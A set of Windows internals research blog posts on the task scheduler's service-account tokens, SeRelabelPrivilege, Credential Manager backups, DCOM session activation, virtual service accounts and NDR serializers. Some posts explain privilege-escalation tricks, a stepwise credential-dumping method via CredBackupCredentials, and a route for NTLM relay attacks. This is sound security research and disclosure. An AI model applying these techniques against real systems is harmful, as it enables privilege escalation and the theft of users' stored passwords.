Reading view

There are new articles available, click to refresh the page.

A Little More on the Task Scheduler's Service Account Usage

Recently I was playing around with a service which was running under a full virtual service account rather than LOCAL SERVICE or NETWORK SERVICE, but it had SeImpersonatePrivilege removed. Looking for a solution I recalled that Andrea Pierini had posted a blog about using virtual service accounts, so I thought I'd look there for inspiration. One thing which was interesting is that he mentioned that a technique abusing the task scheduler found by Clément Labro, which worked for LS or NS, didn't work when using virtual service accounts. I thought I should investigate it further, out of curiosity, and in the process I found an sneaky technique you can use for other purposes.

I've already blogged about the task scheduler's use of service accounts. Specifically in a previous blog post I discussed how you could get the TrustedInstaller group by running a scheduled task using the service SID. As the service SID is the same name as used when you are using a virtual service account it's clear that the problem lies in the way in this functionality is implemented and that it's likely distinct from how LS or NS token's are created.

The core process creation code for the task scheduler in Windows 10 is actually in the Unified Background Process Manager (UBPM) DLL, rather than in the task scheduler itself. A quick look at that DLL we find the following code:

HANDLE UbpmpTokenGetNonInteractiveToken(PSID PrincipalSid) {

  // ...

  if (UbpmUtilsIsServiceSid(PrinicpalSid)) {

    return UbpmpTokenGetServiceAccountToken(PrinicpalSid);

  }

  if (EqualSid(PrinicpalSid, kNetworkService)) {

    Domain = L"NT AUTHORITY";

    User = L"NetworkService";

  } else if (EqualSid(PrinicpalSid, kLocalService)) {

    Domain = L"NT AUTHORITY";

    User = L"LocalService";

  }

  HANDLE Token;

  if (LogonUserExExW(User, Domain, Password, 

    LOGON32_LOGON_SERVICE, 

    LOGON32_PROVIDER_DEFAULT, &Token)) {

    return Token;

  }

  // ...

}


This UbpmpTokenGetNonInteractiveToken function is taking the principal SID from the task registration or passed to RunEx and determining what it represents to get back the token. It checks if the SID is a service SID, by which is means the NT SERVICE\NAME SID we used in the previous blog post. If it is it calls a separate function, UbpmpTokenGetServiceAccountToken to get the service token.

Otherwise if the SID is NS or LS then it specifies the well know names for those SIDs and called LogonUserExEx with the LOGON32_LOGON_SERVICE type. The UbpmpTokenGetServiceAccountToken function does the following:

TOKEN UbpmpTokenGetServiceAccountToken(PSID PrincipalSid) {

  LPCWSTR Name = UbpmUtilsGetAccountNamesFromSid(PrincipalSid);

  SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

  SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);

  HANDLE Token;

  GetServiceProcessToken(g_ScheduleServiceHandle, service, &Token);

  return Token;

}

This function gets the name from the service SID, which is the name of the service itself and opens it for all access rights (SERVICE_ALL_ACCESS). If that succeeds then it passes the service handle to an undocumented SCM API, GetServiceProcessToken, which returns the token for the service. Looking at the implementation in SCM this basically uses the exact same code as it would use for creating the token for starting the service. 

This is why there's a distinction between LS/NS and a virtual service account using Clément's technique. If you use LS/NS the task scheduler gets a fresh token from the LSA with no regards to how the service is configured. Therefore the new token has SeImpersonatePrivilege (or what ever else is allowed). However for a virtual service account the service asks the SCM for the service's token, as the SCM knows about what restrictions are in place it honours things like privileges or the SID type. Therefore the returned token will be stripped of SeImpersonatePrivilege again even though it'll technically be a different token to the currently running service.

Why does the task scheduler need some undocumented function to get the service token? As I mentioned in a previous blog post about virtual accounts only the SCM (well technically the first process to claim it's the SCM) is allowed to authenticate a token with a virtual service account. This seems kind of pointless if you ask me as you already need SeTcbPrivilege to create the service token, but it is what it is.

Okay, so now we know why Clément's technique doesn't get you back any privileges. You might now be asking, so what? Well one interesting behavior came from looking at how the task scheduler determines if you're allowed to specify a service SID as a principal. In my blog post of creating a task running as TrustedInstaller I implied it needed administrator access, which is sort of true and sort of not. Let's see the function the task scheduler uses to determine if the caller's allowed to run a task as a specified principal.

BOOL IsPrincipalAllowed(User& principal) {

  RpcAutoImpersonate::RpcAutoImpersonate();

  User caller;

  User::FromImpersonationToken(&caller);

  RpcRevertToSelf();

  if (tsched::IsUserAdmin(caller) || 

      caller.IsLocalSystem(caller)) {

    return TRUE;

  }

  

  if (principal == caller) {

    return TRUE;

  }


  if (principal.IsServiceSid()) {

    LPCWSTR Name = principal.GetAccount();

    RpcAutoImpersonate::RpcAutoImpersonate();

    SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

    SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);

    RpcRevertToSelf();

    if (service) {

      return TRUE;

    }

  }

  return FALSE;

}

The IsPrincipalAllowed function first checks if the caller is an administrator or SYSTEM. If it is then any principal is allowed (again not completely true, but good enough). Next it checks if the principal's user SID matches the one we're setting. This is what would allow NS/LS or a virtual service account to specify a task running as their own user account. 


Finally, if the principal is a service SID, then it tries to open the service for full access while impersonating the caller. If that succeeds it allows the service SID to be used as a principal. This behaviour is interesting as it allows for a sneaky way to abuse badly configured services. 


It's a well known check for privilege escalation that you enumerate all local services and see if any of them grant a normal user privileged access rights, mainly SERVICE_CHANGE_CONFIG. This is enough to hijack the service and get arbitrary code running as the service account. A common trick is to change the executable path and restart the service, but this isn't great for a few different reasons.

  1. Changing the executable path could easily be noticed.
  2. You probably want to fix the path back again afterwards, which is just a pain.
  3. If the service is currently running you'll need stop the service, then restart the modified service to get the code execution.
However, as long as your account is granted full access to the service you can use the task scheduler even without being an administrator to get code running as the service's user account, such as SYSTEM, without ever needing to modify the service's configuration directly or stop/start the service. Much more sneaky. Of course this does mean that the token the task runs under might have privileges stripped etc, but that's something which is easy enough to deal with (as long as it's not write restricted).

This is a good lesson on how to never take things on face value. I just assumed the caller would need administrator privileges to set the service account as the principal for a task. But it seems that's not actually required if you dig into the code. Hopefully someone will find it useful.

Footnote: If you read this far, you might also ask, can you get back SeImpersonatePrivilege from a virtual service account or not? Of course, you just use the named pipe trick I described in a previous blog post. Because of the way that the token is created the token stored in the logon session will still have all the assigned privileges. You can extract the token by using the named pipe to your own service, and use that to create a new process and get back all the missing privileges.






The Much Misunderstood SeRelabelPrivilege

Based on my previous blog post I recently had a conversation with a friend and well-known Windows security researcher about token privileges. Specifically, I was musing on how SeTrustedCredmanAccessPrivilege is not a "God" privilege. After some back and forth it seemed we were talking at cross purposes. My concept of a "God" privilege is one which the kernel considers to make a token elevated (see Reading Your Way Around UAC (Part 3)) and so doesn't make it available to any token with an integrity level less than High. They on the other hand consider such a privilege to be one where you can directly compromise a resource or the OS as a whole by having the privilege enabled, this might include privileges which aren't strictly a "God" from the kernel's perspective but can still allow system compromise.

After realizing the misunderstanding I was still surprised that one of the privileges in their list wasn't considering a "God", specifically SeRelabelPrivilege. It seems that there's perhaps some confusion as to what this privilege actually allows you to do, so I thought it'd be worth clearing it up.

Point of pedantry: I don't believe it's correct to say that a resource has an integrity level. It instead has a mandatory label, which is stored in an ACE in the SACL. That ACE contains a SID which maps to an integrity level and an mandatory policy which is stored in the access mask. The combination of integrity level and policy is what determines what access is granted (although you can't grant write up through the policy). The token on the other hand does have an integrity level and a separate mandatory policy, which isn't the same as the one in the ACE. Oddly you specify the value when calling SetTokenInformation using a TOKEN_MANDATORY_LABEL structure, confusing I know.

As with a lot of privileges which don't get used very often the official documentation is not great. You can find the MSDN documentation here. The page is worse than usual as it seems to have been written at a time in the Vista/Longhorn development when the Mandatory Integrity Control (MIC) (or as it calls it Windows Integrity Control (WIC)) feature was still in flux. For example, it mentions an integrity level above System, called Installer. Presumably Installer was the initial idea to block administrators modifying system files, which was replaced by the TrustedInstaller SID as the owner (see previous blog posts). There is a level above System in Vista, called Protected Process, which is not usable as protected processes was implementing using a different mechanism. 

Distilling what the documentation says the privilege does, it allows for two operations. First it allows you to set the integrity level in a mandatory label ACE to be above the caller's token integrity level. Normally as long as you've been granted WRITE_OWNER access to a resource you can set the label's integrity level to any value less than or equal to the caller's integrity level.

For example, if you try to set the resource's label to System, but the caller is only at High then the operation fails with the STATUS_INVALID_LABEL error. If you enable SeRelabelPrivilege then you can set this operation will succeed. 

Note, the privilege doesn't allow you to raise the integrity level of a token, you need SeTcbPrivilege for that. You can't even raise the integrity level to be less than or equal to the caller's integrity level, the operation can only decrease the level in the token without SeTcbPrivilege.

The second operation is that you can decrease the label. In general you can always decrease the label without the privilege, unless the resource's label is above the callers. For example you can set the label to Low without any special privilege, as long as you have WRITE_OWNER access on the handle and the current label is less than or equal to the caller's. However, if the label is System and the caller is High then they can't decrease the label and the privilege is required.

The documentation has this to say (emphasis mine):

"If malicious software is set with an elevated integrity level such as Trusted Installer or System, administrator accounts do not have sufficient integrity levels to delete the program from the system. In that case, use of the Modify an object label right is mandated so that the object can be relabeled. However, the relabeling must occur by using a process that is at the same or a higher level of integrity than the object that you are attempting to relabel."

This is a very confused paragraph. First it indicates that an administrator can't delete resource with Trusted Installer or System integrity labels and so requires the privilege to relabel. And then it says that the process doing the relabeling must be at a greater or equal integrity level to do the relabeling. Which if that is the case you don't need the privilege. Perhaps the original design on mandatory labels was more sticky, as in maybe you always needed SeRelabelPrivilege to reduce the label regardless of its current value?

At any rate the only user that gets SeRelabelPrivilege by default is SYSTEM, which defaults to the System integrity level which is already the maximum allowed level so this behavior of the privilege seems pretty much moot. At any rate as it's a "God" privilege it will be disabled if the token has an integrity level less than High, so this lowering operation is going to be rarely useful.

This leads in to the most misunderstood part which if you squint you might be able to grasp from the privilege's documentation. The ability to lower the label of a resource is mostly dependent on whether the caller can get WRITE_OWNER access to the resource. However, the WRITE_OWNER access right is typically part of GENERIC_ALL in the generic mapping, which means it will never be granted to a caller with a lower integrity level regardless of the DACL or whether they're the owner. 

This is the interesting thing the privilege brings to the lowering operation, it allows the caller to circumvent the MIC check for WRITE_OWNER. This then allows the caller to open for WRITE_OWNER a higher labeled resource and then change the label to any level it likes. This works the same way as SeTakeOwnershipPrivilege, in that it grants WRITE_OWNER without ever checking the DACL. However, if you use SeTakeOwnershipPrivilege it'll still be subject to the MIC check and will not grant access if the label is above the caller's integrity level.

The problem with this privilege is down to the design of MIC, specifically that WRITE_OWNER is overloaded to allow setting the resource's mandatory label but also its traditional use of setting the owner. There's no way for the kernel to distinguish between the two operations once the access has been granted (or at least it doesn't try to distinguish). 

Surely, there is some limitation on what type of resource can be granted WRITE_OWNER access? Nope, it seems that even if the caller does not have any access rights to the resource it will still be granted WRITE_OWNER access. This makes the SeRelabelPrivilege exactly like SeTakeOwnershipPrivilege but with the adding feature of circumventing the MIC check. Summarizing, a token with SeRelabelPrivilege enabled can take ownership of any resource it likes, even one which has a higher label than the caller.

You can of course verify this yourself, here's some PowerShell script using NtObjectManager which you should run as an administrator. The script creates a security descriptor which doesn't grant SYSTEM any access, then tries to request WRITE_OWNER without and with SeRelabelPrivilege.

PS> $sd = New-NtSecurityDescriptor "O:ANG:AND:(A;;GA;;;AN)" -Type Directory
PS> Invoke-NtToken -System {
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status               Granted Access Privileges
------               -------------- ----------
STATUS_ACCESS_DENIED 0              NONE

PS> Invoke-NtToken -System {
   Enable-NtTokenPrivilege SeRelabelPrivilege
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status         Granted Access Privileges
------         -------------- ----------
STATUS_SUCCESS WriteOwner     SeRelabelPrivilege

The fact that this behavior is never made explicit is probably why my friend didn't realize its behavior before. This coupled with the privilege's rare usage, only being granted by default to SYSTEM means it's not really a problem in any meaningful sense. It would be interesting to know the design choices which led to the privilege being created, it seems like its role was significantly more important at some point and became almost vestigial during the Vista development process. 

If you've read this far is there any actual useful scenario for this privilege? The only resources which typically have elevated labels are processes and threads. You can already circumvent the MIC check using SeDebugPrivilege. Of course usage of that privilege is probably watched like a hawk, so you could abuse this privilege to get full access to an elevated process, by accessing changing the owner to the caller and lowering the label. Once you're the owner with a low label you can then modify the DACL to grant full access directly without SeDebugPrivilege.

However, as only SYSTEM gets the privilege by default you'd need to impersonate the token, which would probably just allow you to access the process anyway. So mostly it's mostly a useless quirk unless the system you're looking at has granted it to the service accounts which might then open the door slightly to escaping to SYSTEM.

Dumping Stored Credentials with SeTrustedCredmanAccessPrivilege

I've been going through the various token privileges on Windows trying to find where they're used. One which looked interesting is SeTrustedCredmanAccessPrivilege which is documented as "Access Credential Manager as a trusted caller". The Credential Manager allows a user to store credentials, such as web or domain accounts in a central location that only they can access. It's protected using DPAPI so in theory it's only accessible when the user has authenticated to the system. The question is, what does having SeTrustedCredmanAccessPrivilege grant? I couldn't immediately find anyone who'd bothered to document it, so I guess I'll have to do it myself.

The Credential Manager is one of those features that probably sounded great in the design stage, but does introduce security risks, especially if it's used to store privileged domain credentials, such as for remote desktop access. An application, such as the remote desktop client, can store domain credential using the CredWrite API and specifying the username and password in the CREDENTIAL structure. The type of credentials should be set to CRED_TYPE_DOMAIN_PASSWORD.

An application can then access the stored credentials for the current user using APIs such as CredRead or CredEnumerate. However, if the type of credential is CRED_TYPE_DOMAIN_PASSWORD the CredentialBlob field which should contain the password is always empty. This is an artificial restriction put in place by LSASS which implements the credential manager RPC service. If a domain credentials type is being read then it will never return the password.

How does the domain credentials get used if you can't read the password? Security packages such as NTLM/Kerberos/TSSSP which are running within the LSASS process can use an internal API which doesn't restrict the reading of the domain password. Therefore, when you authenticate to the remote desktop service the target name is used to lookup available credentials, if they exist the user will be automatically authenticated.

The credentials are stored in files in the user's profile encrypted with the user's DPAPI key. Why can we not just decrypt the file directly to get the password? When writing the file LSASS sets a system flag in the encrypted blob which makes the DPAPI refuse to decrypt the blob even though it's still under a user's key. Only code running in LSASS can call the DPAPI to decrypt the blob.

If we have administrator privileges getting access the password is trivial. Read the Mimikatz wiki page to understand the various ways that you can use the tool to get access to the credentials. However, it boils down to one of the following approaches:

  1. Patch out the checks in LSASS to not blank the password when read from a normal user.
  2. Inject code into LSASS to decrypt the file or read the credentials.
  3. Just read them from LSASS's memory.
  4. Reimplement DPAPI with knowledge of the user's password to ignore the system flag.
  5. Play games with the domain key backup protocol.
For example, Nirsoft's CredentialsFileView seems to use the injection into LSASS technique to decrypt the DPAPI protected credential files. (Caveat, I've only looked at v1.07 as v1.10 seems to not be available for download anymore, so maybe it's now different. UPDATE: it seems available for download again but Defender thinks it's malware, plus ça change).

At this point you can probably guess that SeTrustedCredmanAccessPrivilege allows a caller to get access to a user's credentials. But how exactly? Looking at LSASRV.DLL which contains the implementation of the Credential Manager the privilege is checked in the function CredpIsRpcClientTrusted. This is only called by two APIs, CredrReadByTokenHandle and CredrBackupCredentials which are exported through the CredReadByTokenHandle and CredBackupCredentials APIs.

The CredReadByTokenHandle API isn't that interesting, it's basically CredRead but allows the user to read from to be specified by providing the user's token. As far as I can tell reading a domain credential still returns a blank password. CredBackupCredentials on the other hand is interesting. It's the API used by CREDWIZ.EXE to backup a user's credentials, which can then be restored at a later time. This backup includes all credentials including domain credentials. The prototype for the API is as follows:

BOOL WINAPI CredBackupCredentials(HANDLE Token, 
                                  LPCWSTR Path, 
                                  PVOID Password, 
                                  DWORD PasswordSize, 
                                  DWORD Flags);

The backup process is slightly convoluted, first you run CREDWIZ on your desktop and select backup and specify the file you want to write the backup to. When you continue with the backup the process makes an RPC call to your WinLogon process with the credentials path which spawns a new copy of CREDWIZ on the secure desktop. At this point you're instructed to use CTRL+ALT+DEL to switch to the secure desktop. Here you type the password, which is used to encrypt the file to protect it at rest, and is needed when the credentials are restored. CREDWIZ will even ensure it meets your system's password policy for complexity, how generous.

CREDWIZ first stores the file to a temporary file, as LSASS encrypts the encrypted contents with the system DPAPI key. The file can be decrypted then written to the final destination, with appropriate impersonation etc.

The only requirement for calling this API is having the SeTrustedCredmanAccessPrivilege privilege enabled. Assuming we're an administrator getting this privilege is easy as we can just borrow a token from another process. For example, checking for what processes have the privilege shows obviously WinLogon but also LSASS itself even though it arguably doesn't need it.

PS> $ts = Get-AccessibleToken
PS> $ts | ? { 
   "SeTrustedCredmanAccessPrivilege" -in $_.ProcessTokenInfo.Privileges.Name 
}
TokenId Access                                  Name
------- ------                                  ----
1A41253 GenericExecute|GenericRead    LsaIso.exe:124
1A41253 GenericExecute|GenericRead     lsass.exe:672
1A41253 GenericExecute|GenericRead winlogon.exe:1052
1A41253 GenericExecute|GenericRead atieclxx.exe:4364

I've literally no idea what the ATIECLXX.EXE process is doing with SeTrustedCredmanAccessPrivilege, it's probably best not to ask ;-)

To use this API to backup a user's credentials as an administrator you do the following. 
  1. Open a WinLogon process for PROCESS_QUERY_LIMITED_INFORMATION access and get a handle to its token with TOKEN_DUPLICATE access.
  2. Duplicate token into an impersonation token, then enable SeTrustedCredmanAccessPrivilege.
  3. Open a token to the target user, who must already be authenticated.
  4. Call CredBackupCredentials while impersonating the WinLogon token passing a path to write to and a NULL password to disable the user encryption (just to make life easier). It's CREDWIZ which enforces the password policy not the API.
  5. While still impersonating open the file and decrypt it using the CryptUnprotectData API, write back out the decrypted data.
If it all goes well you'll have all the of the user's credentials in a packed binary format. I couldn't immediately find anyone documenting it, but people obviously have done before. I'll leave doing all this yourself as a exercise for the reader. I don't feel like providing an implementation.


Why would you do this when there already exists plenty of other options? The main advantage, if you can call it that, it you never touch LSASS and definitely never inject any code into it. This wouldn't be possible anyway if LSASS is running as PPL. You also don't need to access the SECURITY hive to extract DPAPI credentials or know the user's password (assuming they're authenticated of course). About the only slightly suspicious thing is opening WinLogon to get a token, though there might be alternative approaches to get a suitable token.



Standard Activating Yourself to Greatness

This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. This relied on the fact that if you're in logged in as a user on session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage the DCOM activator would create the object on the lowest interactive session rather than the session 0. Once an object is created the initial unmarshal of the IStorage object would happen in the context of the user authenticated to that session. If that happens to be a privileged user such as a Domain Administrator then the NTLM authentication could be relayed to a remote server and fun ensues.

The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

Of course this already exists, you can use the session moniker to activate an object cross-session (other than to session 0 which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeated told Microsoft they need to fix this activation route as it makes no sense than a non-administrator can do it. But my warnings have not been heeded. 

If you read the description of the session moniker you might notice a problem for us, it can't be combined with IStorage activation. The COM APIs only give us one or the other. However, if you poke around at the DCOM protocol documentation you'll notice that they are technically independent. The session activation is specified by setting the dwSessionId field in the SpecialPropertiesData activation property. And the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

The problem with testing this out is implementing DCOM activation is ugly. The activation properties first need to be NDR marshalled in a blob. They then need to be packaged up correctly before it can be sent to the activator. Also the documentation is only for remote activation which is not we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

No, sorry. There is an undocumented way though if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to just look at how the system already does it. Specifically we can look at how session moniker is activating the object and maybe from that we'll be lucky and we can reuse that for our own purposes.

Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to create parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality which we don't care about. We'll just start at the MkParseDisplayName which is in OLE32.

HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName, 
      ULONG *pchEaten, LPMONIKER *ppmk) {
  HRESULT hr = FindLUAMoniker(pbc, szUserName, &pcchEaten, &ppmk);
  if (hr == MK_E_UNAVAILABLE) {
    hr = FindSessionMoniker(pbc, szUserName, &pcchEaten, &ppmk);
  }
  // Parse rest of moniker.
}

Almost immediately we see a call to FindSessionMoniker, seems promising. Looking into that function we find what we need.

HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName, 
                           ULONG *pchEaten, LPMONIKER *ppmk) {
  DWORD dwSessionId = 0;
  BOOL bConsole = FALSE;
  
  if (wcsnicmp(pszDisplayName, L"Session:", 8))
    return MK_E_UNAVAILABLE;
  
  
if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
    dwConsole = TRUE;
    *pcbEaten = 15;
  } else {
    LPWSTR EndPtr;
    dwSessionId = wcstoul(pszDisplayName + 8, &End, 0);
    *pcbEaten = EndPtr - pszDisplayName;
  }

  *ppmk = new CSessionMoniker(dwSessionId, bConsole);
  return S_OK;
}

This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this is not doing any activation yet. You don't use the session moniker in isolation, instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:

Session:3!clsid:0002DF02-0000-0000-C000-000000000046

The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046 which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right most moniker, which is the class moniker.

HRESULT CClassMoniker::BindToObject(LPBC pbc, 
  LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
  if (pmkToLeft) {
      IClassActivator pClassActivator;
      pmkToLeft->BindToObject(pcb, nullptr, 
        IID_IClassActivator, &pClassActivator);
      return pClassActivator->GetClassObject(m_clsid, 
            CLSCTX_SERVER, 0, riid, ppv);

  }
  // ...
}

The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

HRESULT CSessionMoniker::GetClassObject(
   REFCLSID pClassID, CLSCTX dwClsContext, 
   LCID locale, REFIID riid, void **ppv) {
  IStandardActivator* pActivator;
  CoCreateInstance(&CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, 
    IID_IStandardActivator, &pActivator);

 
  ISpecialSystemProperties pSpecialProperties;
  pActivator->QueryInterface(IID_ISpecialSystemProperties, 
      &pSpecialProperties);
  pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
  return pActivator->StandardGetClassObject(pClassId, dwClsContext, 
                                            NULL, riid, ppv);

}

Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state. It then calls the StandardGetClassObject method on the IStandardActivator and you should now have a COM server cross-session. None of these interface or the class are officially documented of course (AFAIK).

The $1000 question is, can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE for the implementation of the interface you find one of its functions is:

HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
  REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
  IStorage* pstg, int dwCount, MULTI_QI pResults[]);

It seems that the answer is yes. Of course it's possible that you still can't mix the two things up. That's why I wrote a quick and dirty example in C#, which is available here. Seems to work fine. Of course I've not tested it out with the actual vulnerability to see it works in that scenario. That's something for others to do.

Creating your own Virtual Service Accounts

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create out own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can login the account you need to grant it a logon right. This is normally SeServiceLogonRight if you wanted a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want document these features even though it could be a useful thing for normal developers.



Using LsaManageSidNameMapping to add a name to a SID.

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
Basically 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15) and we can't just go straight to added the SID to name as we need to have registered the domain with the API, it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


Generating NDR Type Serializers for C#

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

If you look at the Decode function when compiled for a X64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_ProxyInfo,
         TypePicklingOffsetTable,
         0,
         _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more that one structure in a stream.
  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

